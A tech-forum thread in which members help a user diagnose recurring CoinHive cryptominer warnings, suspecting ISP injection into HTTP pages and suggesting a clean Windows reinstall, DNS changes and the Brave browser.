Wait to check with other 4g/mobile connection,there is a chance that your net connection itself is compromised(e.g.if you are using net on pc via mobile & mobile itself is infected with some android malware which insert itself into every web page you visit from pc) or if your net provider's network is infected(possible if it is some small cable operator type connection & not big ones like airtel etc) & every web page you visit is getting infected at your net provider's end as traffic has to pass through there.


----------



## andy_65_in (Nov 4, 2019)

whitestar_999 said:


> Wait to check with other 4g/mobile connection,there is a chance that your net connection itself is compromised(e.g.if you are using net on pc via mobile & mobile itself is infected with some android malware which insert itself into every web page you visit from pc) or if your net provider's network is infected(possible if it is some small cable operator type connection & not big ones like airtel etc) & every web page you visit is getting infected at your net provider's end as traffic has to pass through there.



I dont thnk the net connection is compromised.im using both my mobiles on it..they work..infact right now my pc is also typing this reply!!!but mostly surfing on this pc gets fingered by avast...windows update is blocked....downloaded spyhunter 5..but the dam avast didnt permit its installation...lol...confusion on the rise..btw secure websites are accesible like sbi online etc...should i get the paid avast version right now????


----------



## andy_65_in (Nov 4, 2019)

If 4 g also fails...then it means the pc is infected?


----------



## whitestar_999 (Nov 4, 2019)

andy_65_in said:


> I dont thnk the net connection is compromised.im using both my mobiles on it..they work..infact right now my pc is also typing this reply!!!but mostly surfing on this pc gets fingered by avast...windows update is blocked....downloaded spyhunter 5..but the dam avast didnt permit its installation...lol...confusion on the rise..btw secure websites are accesible like sbi online etc...should i get the paid avast version right now????


Don't be so sure. Mobiles will work fine because mining trojans are designed for windows & not android. Secure websites are called "secured" because the data connection made over a secured website connection cannot be intercepted & modified else web page will fail to load saying connection error. To me it seems that your data leaving the pc is getting modified & infected which is why no matter what you do nothing will work(incl buying any av paid version). Wait to test with a different connection(4g/3g/2g,doesn't matter as long as it is a different net connection provider than the one you are currently using).


----------



## cute.bandar (Nov 5, 2019)

Are you using wifi for your PC ? or connecting through mobile 4g with usb cable ?

If wifi, then its possible your router is compromised. To check, disconnect wifi, connect with mobile, clear dns on windows, restart browser, then try . Also if you have other devices on the same wifi network, then try to open the same websites on mobile that are being blocked on desktop. 
Also can try Run "ping blockedwebsite.com" in cmd in windows. 

Another thing to try: make a bootable linux usb drive. boot from it and open those blocked websites.

Post exact information, filenames etc of the malware, popups, websites blocked. Uninstall the antivirus if you have to, to find this. No use buying avast paid.


----------



## sling-shot (Nov 5, 2019)

meetdilip said:


> Avast has a boot time scan option. Give it a try.


Do this first.


----------



## whitestar_999 (Nov 5, 2019)

cute.bandar said:


> Are you using wifi for your PC ? or connecting through mobile 4g with usb cable ?
> 
> If wifi, then its possible your router is compromised. To check, disconnect wifi, connect with mobile, clear dns on windows, restart browser, then try . Also if you have other devices on the same wifi network, then try to open the same websites on mobile that are being blocked on desktop.
> Also can try Run "ping blockedwebsite.com" in cmd in windows.
> ...


Malware seems to be crypto miners which embed itself into browser so probably won't show up on mobiles as main purpose of crypto miners is to use infected system pc processor for mining crypto currency & mobile phone processors are not powerful enough(at least most of them compared to desktop/laptop processors). As for bootable linux versions,again I am not sure if the same miner can work inside linux browser versions.Best way to check would be another laptop with windows installed.


----------



## Desmond (Nov 5, 2019)

I think the best option is to format your PC and reinstall your OS. No point wasting too much energy in disinfecting your PC which is time consuming and itself not guaranteed to be perfect.


----------



## meetdilip (Nov 5, 2019)

Looks like his modem has a hijacked DNS. Otherwise, something on the network is the culprit.


----------



## Desmond (Nov 5, 2019)

meetdilip said:


> Looks like his modem has a hijacked DNS. Otherwise, something on the network is the culprit.


Wouldn't a factory reset fix this? In a worst case, perhaps a flash a new ROM?


----------



## meetdilip (Nov 5, 2019)

Both should work.


----------



## andy_65_in (Nov 5, 2019)

Desmond David said:


> I think the best option is to format your PC and reinstall your OS. No point wasting too much energy in disinfecting your PC which is time consuming and itself not guaranteed to be perfect.


I can do that again...but...im using a paid wi fi network which is being used in the entire cantt where i am....i mean  many users...so i iant change the bloody net...but advice me what to do after i re format my pc since i will use the same network....


----------



## andy_65_in (Nov 5, 2019)

Desmond David said:


> Wouldn't a factory reset fix this? In a worst case, perhaps a flash a new ROM?


I did the complete formatting once....took me 6 hours...can do that again....but uske baad what should i do...ill revert to win 10 only...update the pc?? and carry on with win defender only???


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I can do that again...but...im using a paid wi fi network which is being used in the entire cantt where i am....i mean  many users...so i iant change the bloody net...but advice me what to do after i re format my pc since i will use the same network....



Did you put the backup files back in the hdd after clean install.Better not to do i think virus is causing from such files.When you put back they infect the windows files.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> Did you put the backup files back in the hdd after clean install.Better not to do i think virus is causing from such files.When you put back they infect the windows files.
> 
> 
> Sent from my iPhone using Tapatalk


I didnt use any phydical device...used gdrive to backup


----------



## andy_65_in (Nov 5, 2019)

As i start win update again...the avast flashes it aborted update bcoz of js miner av...so im stuck....the dam thing has now started flashing continously...this avast warns me to update....karoon kya...i feel i re format this pc...then see the nxt mov


----------



## andy_65_in (Nov 5, 2019)

Started the formatting again....


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I didnt use any phydical device...used gdrive to backup



Gdrive files could be affected too.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> Gdrive files could be affected too.
> 
> 
> Sent from my iPhone using Tapatalk


This is crazy...are you sure


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> This is crazy...are you sure



Yes,i dont think gdrive checks for infected software before uploading.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

Ok...now reformat started....what should i do after it completes..merely update windows or


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Ok...now reformat started....what should i do after it completes..merely update windows or



Dont put back backup files just installed av first then chrome and check you still getting trojan notification.


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

Which Window ISO are you using ? Download the latest from MS website. Or borrow one. Don't download anything through this network to be installed on clean PC. Take refuge at some friend's.

Comodo Firewall comes with some module which keeps you safe on public WiFi.


----------



## andy_65_in (Nov 5, 2019)

Ok....


pkkumarcool said:


> Dont put back backup files just installed av first then chrome and check you still getting trojan notification.
> 
> 
> Sent from my iPhone using Tapatalk


ok...perhaps i use a free av...avast again??or what


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Ok....
> ok...perhaps i use a free av...avast again??or what



Yes but better use paid av later


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

meetdilip said:


> Which Window ISO are you using ? Download the latest from MS website. Or borrow one. Don't download anything through this network to be installed on clean PC. Take refuge at some friend's.
> 
> Comodo Firewall comes with some module which keeps you safe on public WiFi.


I used no ISO....the reformat instaaled win 10..


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I used no ISO....the reformat instaaled win 10..



?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

andy_65_in said:


> instaaled win 10..



using ?

1. DVD

2. USB

from which source did you build them ?


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> ?
> 
> 
> Sent from my iPhone using Tapatalk


I used no ISO....when i started again after the format...i was on win 10..my previous version


----------



## andy_65_in (Nov 5, 2019)

meetdilip said:


> using ?
> 
> 1. DVD
> 
> ...


I have a us made hp..which came to me with win 8...upgraded free to win 10 3 yr ago when ms offered that update free


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I used no ISO....when i started again after the format...i was on win 10..my previous version



No i mean download fresh win 10 iso from official website then use rufus to make bootable pendrive then install 


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

Can i do


pkkumarcool said:


> No i mean download fresh win 10 iso from official website then use rufus to make bootable pendrive then install
> 
> 
> Sent from my iPhone using Tapatalk


 Can i do this on the newly formatted pc


----------



## whitestar_999 (Nov 5, 2019)

Download Windows 10

What happened to testing with some other mobile data connection?


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Can i do
> 
> Can i do this on the newly formatted pc



How have you been clean installing windows all this time?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

andy_65_in said:


> I have a us made hp..which came to me with win 8...upgraded free to win 10 3 yr ago when ms offered that update free


So you are just formatting drives ? What about My Documents, Pictures, Videos etc ? How are you getting new Windows 10 each time ?


----------



## SaiyanGoku (Nov 5, 2019)

andy_65_in said:


> Can i do
> 
> Can i do this on the newly formatted pc


You'll still risk infecting that new iso. Do you have a clean, untouched live usb drive you can use to boot from (linux or HBCD)?


----------



## andy_65_in (Nov 5, 2019)

whitestar_999 said:


> Download Windows 10
> 
> What happened to testing with some other mobile data connection?


I tried....the mobilec


meetdilip said:


> So you are just formatting drives ? What about My Documents, Pictures, Videos etc ? How are you getting new Windows 10 each time ?


After formatting the whole pc ...is the iso file required to fully get win 10....if so....i i wi have to use a clean pendrive? and copy in that the iso image??


----------



## SaiyanGoku (Nov 5, 2019)

andy_65_in said:


> I tried....the mobilec
> 
> After formatting the whole pc ...is the iso file required to fully get win 10....if so....i i wi have to use a clean pendrive? and copy in that the iso image??


DO NOT use your infected pc to download the iso or create a bootable usb drive.


----------



## andy_65_in (Nov 5, 2019)

SaiyanGoku said:


> DO NOT use your infected pc to download the iso or create a bootable usb drive.


Ok..ill use a different pc to download the iso tool and then the iso file in a seperate pendrive...then i use this pendrive to install win 10 on my affected pc...is this correct


----------



## TheSloth (Nov 5, 2019)

andy_65_in said:


> Ok..ill use a different pc to download the iso tool and then the iso file in a seperate pendrive...then i use this pendrive to install win 10 on my affected pc...is this correct


Yes.
1. Get thebootable USB stick ready with friend's PC.
2. Then plug in the USB in laptop and turn on the laptop.
3. Press F2 or Del key to get into BIOS and change the settings to boot from USB.
4. choose "Save the settings and exit from BIOS".
5. Your laptop will reboot and go to Win 10 installer on USB. 
6. Select Clean install and wipe entire HDD because you have already taken backup. 
7. After installation, download ESET and set it up. Then restore Google drive backup in small parts and scan.


----------



## whitestar_999 (Nov 5, 2019)

andy_65_in said:


> I tried....the mobilec


And what was the result,do you still get warnings on browsing.


----------



## andy_65_in (Nov 5, 2019)

whitestar_999 said:


> And what was the result,do you still get warnings on browsing.


Today the 4g was erratic....will try after iso update..wondering should i get back my kis...i still know its key...had removed it


----------



## whitestar_999 (Nov 5, 2019)

Your choice,kis is as good as avast.


----------



## andy_65_in (Nov 5, 2019)

Can a dvd be used to do the work of a usb.....there are issues with usbs in govt offices


----------



## sling-shot (Nov 5, 2019)

Possible but it will be too slow. Also I am not sure if the space is enough.


----------



## whitestar_999 (Nov 5, 2019)

andy_65_in said:


> Can a dvd be used to do the work of a usb.....there are issues with usbs in govt offices


You can but it is a bit technical & involves running some tool/script which I think may also have issue in govt offices.


----------



## andy_65_in (Nov 9, 2019)

Is there any way of installing win 10 in my affected/ fully formatted pc directly from the net  without iso file etc


----------



## Desmond (Nov 9, 2019)

No.

What problem are you facing in making a bootable windows 10 USB? It's as simple as downloading the media creator tool and making a bootable USB using it. You should do this on another PC though.

Sent from my GM1911 using Tapatalk


----------



## SaiyanGoku (Nov 9, 2019)

andy_65_in said:


> Is there any way of installing win 10 in my affected/ fully formatted pc directly from the net  without iso file etc


I think you would need someone to do a network install on your laptop, which is common in an enterprise scenario. I don't think there is another way to do that.


----------



## meetdilip (Nov 9, 2019)

A very simple solution for you. Take it to the nearest laptop repair, tell the problem, ask them if they can fix it. If they say ok, leave it with them, collect it once fixed. All you have to do is shell some money.


----------



## SaiyanGoku (Nov 9, 2019)

meetdilip said:


> A very simple solution for you. Take it to the nearest laptop repair, tell the problem, ask them if they can fix it. If they say ok, leave it with them, collect it once fixed. All you have to do is shell some money.


Yeah, wait till they install some old version of windows which they didn't download from microsoft directly and who knows what other bloatware they'll install.


----------



## pkkumarcool (Nov 9, 2019)

SaiyanGoku said:


> Yeah, wait till they install some old version of windows which they did didn't download from microsoft directly and who knows what other bloatware they'll install.






Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 9, 2019)

There are many people other than us who know how to do their work. Most PC repair guys would know how to fix this.


----------



## sling-shot (Nov 9, 2019)

SaiyanGoku said:


> Yeah, wait till they install some old version of windows which they didn't download from microsoft directly and who knows what other bloatware they'll install.


Just saw a pristine RTM copy of Windows 10 installed after wiping a factory installation in another guy's laptop last week!


----------



## SaiyanGoku (Nov 9, 2019)

sling-shot said:


> Just saw a pristine RTM copy of Windows 10 installed after wiping a factory installation in another guy's laptop last week!


Most of the local repair shops do not bother with downloading latest version. Some are lazy enough to install cracked Windows 10 1703 build (in 2019) Home Single Language 32 bit on a laptop with 8GB ram 
The only place to get an untouched iso is from the OEM or Microsoft directly.


----------



## whitestar_999 (Nov 9, 2019)

meetdilip said:


> There are many people other than us who know how to do their work. Most PC repair guys would know how to fix this.


The issue is to find out "these right people" instead of "any pc repair guy".


----------



## meetdilip (Nov 9, 2019)

If I saw the other threads correctly, OP is at a point where he is about to buy a new laptop. It is much easier to get it repaired through a reputed service centre.


----------



## andy_65_in (Nov 10, 2019)

Thankful to whitestar who took the effort to connect with my pc( anydesk) and identify the coin hive issue..its still there...the IE directs me to coinhive ...which can be noted in the network mode when IE used in private browsing....surprisingly this coinhive not visible in networking when i use 4 g network...im otherwise using a unlimited paid broadband connection....???


----------



## andy_65_in (Nov 12, 2019)

see attached files for the coinhive behaviour both in http and https protocol as pointed out by whitestar..also enclosed is screenshot of the coinhive warning in windows defender


----------



## whitestar_999 (Nov 12, 2019)

Any updates on your net provider reply?


----------



## andy_65_in (Nov 14, 2019)

whitestar_999 said:


> Any updates on your net provider reply?


nothing..hes clear theres nothing wrong with his network..apparently nobody else using it complaining


----------



## andy_65_in (Nov 14, 2019)

sorry for uploading a off topic reply but from the attached file can my pc ki battery life be predicted..the hp battery check tool recommends replacement which i want to avoid in such a old computer..


----------



## whitestar_999 (Nov 14, 2019)

andy_65_in said:


> nothing..hes clear theres nothing wrong with his network..apparently nobody else using it complaining


Nobody will complain if they don't look for it,only option remaining now is to do this same test at some friend/relative pc in their house using same net provider connection in your area.



andy_65_in said:


> sorry for uploading a off topic reply but from the attached file can my pc ki battery life be predicted..the hp battery check tool recommends replacement which i want to avoid in such a old computer..


As long as laptop battery can give a backup of 45 min,it is fine.With time & usage all laptop battery capacity goes down & it depends on you when to replace it(e.g.if you are happy with even a 30 min backup then you can replace it later compared to someone who is not happy with even a 40 min backup because he wants at least 1 hour backup).


----------



## SaiyanGoku (Nov 14, 2019)

andy_65_in said:


> the hp battery check tool recommends replacement which i want to avoid in such a old computer..


If you are not able to find it from official service center, you'll have to look for 3rd party "compatible" batteries from ebay or local shops.


----------



## andy_65_in (Nov 14, 2019)

thanks both Saiyan and whitestar for the advice..please tell me..with the laptop running ok  so far on Defender and free walla Malwarebytes should I 

1. install a paid antivirus(which may then start fingering my browsing because of cojnhive..my guesss).

2. download all my stored data in googledrive on my lappie back(if its clr after a virus scan)


----------



## SaiyanGoku (Nov 14, 2019)

Have you tried this?:
Remove CoinHive In-Browser Miner


----------



## whitestar_999 (Nov 14, 2019)

SaiyanGoku said:


> Have you tried this?:
> Remove CoinHive In-Browser Miner


I checked his pc via remote session.The thing is that I can see coinhive entries being loaded into any http webpage & source of these entries is not some server but rather cache.I already cleaned browser cache earlier so it could only mean that cache here refers to his isp network server because I tried the same with his laptop connected via 4g mobile network & it didn't happen.Also https sites too are unaffected by this because https traffic cannot be intercepted & modified during transit.All this led me to believe that his ISP network itself is infected & any http traffic passing through is being intercepted to load these coinhive entries from isp server cache.

P.S. check the attached pdf proof above


----------



## SaiyanGoku (Nov 14, 2019)

whitestar_999 said:


> I checked his pc via remote session.The thing is that I can see coinhive entries being loaded into any http webpage & source of these entries is not some server but rather cache.I already cleaned browser cache earlier so it could only mean that cache here refers to his isp network server because I tried the same with his laptop connected via 4g mobile network & it didn't happen.Also https sites too are unaffected by this because https traffic cannot be intercepted & modified during transit.All this led me to believe that his ISP network itself is infected & any http traffic passing through is being intercepted to load these coinhive entries from isp server cache.
> 
> P.S. check the attached pdf proof above


Can't check the pdf in office.
Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


----------



## andy_65_in (Nov 14, 2019)

coinhive is back...lol


----------



## andy_65_in (Nov 14, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


brvebrowser install checked by firewall..cant say where


----------



## SaiyanGoku (Nov 14, 2019)

andy_65_in said:


> coinhive is back...lol


Setup log? Something is trying to install another program? 

Could you check startup options and scheduled tasks and try to remove suspicious one by booting into safe mode? (take caution though)


----------



## whitestar_999 (Nov 14, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


Already set dns to 8.8.8.8 in his router settings & https everywhere will not work everywhere as not all sites have a https version(even https pages have some http content). I also tried a proxy(non-https) site to open google with same result.


----------



## whitestar_999 (Nov 14, 2019)

@Desmond David @Nerevarine can you check the pdf attachments on previous page as I am not much familiar with how ISP server cache can affect http page loading.


----------



## Desmond (Nov 14, 2019)

I am currently at work. Can check after I get home.

Sent from my GM1911 using Tapatalk


----------



## sling-shot (Nov 14, 2019)

Have you reset your router? 
Coinhive ...still - Virus, Trojan, Spyware, and Malware Removal Help


----------



## andy_65_in (Nov 15, 2019)

sling-shot said:


> Have you reset your router?
> Coinhive ...still - Virus, Trojan, Spyware, and Malware Removal Help


yes


----------



## SaiyanGoku (Nov 16, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


I've switched over to brave completely and it doesn't requires extra adblockers.


----------



## whitestar_999 (Nov 16, 2019)

SaiyanGoku said:


> I've switched over to brave completely and it doesn't requires extra adblockers.


Even Brave browser would be affected if your ISP server cache itself is modifying http traffic.


----------



## SaiyanGoku (Nov 16, 2019)

whitestar_999 said:


> Even Brave browser would be affected if your ISP server cache itself is modifying http traffic.


Yes but there is inbuilt toggle to force https which is enabled by default. Might help him and there is no harm in trying.


----------



## bssunilreddy (Nov 16, 2019)

SaiyanGoku said:


> I've switched over to brave completely and it doesn't requires extra adblockers.


Brave is a browser?
Does it have sign in like chrome?
I want to be signed into google

Sent from my Nokia 8.1 using Tapatalk


----------



## SaiyanGoku (Nov 16, 2019)

bssunilreddy said:


> Brave is a browser?
> Does it have sign in like chrome?
> I want to be signed into google
> 
> Sent from my Nokia 8.1 using Tapatalk


Yes it is a chromium based browser. It is privacy focused so doesn't allows sign in like Chrome IIRC
How can i log in in Brave browser?


> There is no login feature for Brave and there wont be one in future as well. For bookmarks we are implementing Sync which works with other Brave browsers on desktop/iOS/Android. In future iterations sync would also support history and site settings and possibly passwrods. But at no point will you ever have to login to use any of these features.
> 
> Hope this helps. The Google features you mentioned are not going to be part of Brave as the application model is very different.


----------



## whitestar_999 (Nov 16, 2019)

SaiyanGoku said:


> Yes but there is inbuilt toggle to force https which is enabled by default. Might help him and there is no harm in trying.


The problem is that not all sites have https version & btw that injected coinhive entry is also using https ironically.


----------



## andy_65_in (Nov 16, 2019)

successfully installed bravebrowser..there wasn't any interference this time....using it..hoping coinhive will not bother now


----------



## andy_65_in (Nov 24, 2019)

brave browser working fine..seamless surfing..no coinhive so far


----------



## whitestar_999 (Nov 24, 2019)

andy_65_in said:


> brave browser working fine..seamless surfing..no coinhive so far


Can you do the same test as before & check the entries loading at the time of page loading(menu--view--toggle developer tools  look for something like network tab)?


----------



## andy_65_in (Nov 25, 2019)

whitestar_999 said:


> Can you do the same test as before & check the entries loading at the time of page loading(menu--view--toggle developer tools  look for something like network tab)?


brave browser doesnt permit copy of the network contents unlike google...no screenshot also


----------



## whitestar_999 (Nov 25, 2019)

andy_65_in said:


> brave browser doesnt permit copy of the network contents unlike google...no screenshot also


prt src/print screen key should still work.


----------



## pkkumarcool (Nov 27, 2019)

andy_65_in said:


> brave browser working fine..seamless surfing..no coinhive so far



Check installing chrome again.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Dec 13, 2019)

any risks in using brave browser with scripts block mode disabled...thats required as i cant access gmail,facebook


----------



## SaiyanGoku (Dec 13, 2019)

andy_65_in said:


> any risks in using brave browser with scripts block mode disabled...thats required as i cant access gmail,facebook


I'm using it with Brave shield enabled without any issues for Gmail.


----------



## andy_65_in (Dec 13, 2019)

SaiyanGoku said:


> I'm using it with Brave shield enabled without any issues for Gmail.


I had issues with facebook and gmail...javascript not enabled....hows that to be done.....so both wont open


----------

